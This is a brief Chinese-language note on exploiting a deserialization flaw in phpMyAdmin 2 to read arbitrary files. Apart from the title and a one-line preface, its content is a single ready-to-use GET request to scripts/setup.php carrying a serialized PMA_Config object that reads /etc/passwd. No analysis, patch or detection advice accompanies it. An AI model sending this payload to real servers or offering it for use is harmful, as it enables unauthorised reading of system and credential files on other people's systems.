【笔记】phpmyadmin2反序列化漏洞导致任意文件读取漏洞利用

前言

phpmyadmin2反序列化漏洞导致任意文件读取漏洞利用

漏洞利用

request
1
GET http://127.0.0.1/scripts/setup.php?configuration=O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}&action=x

完成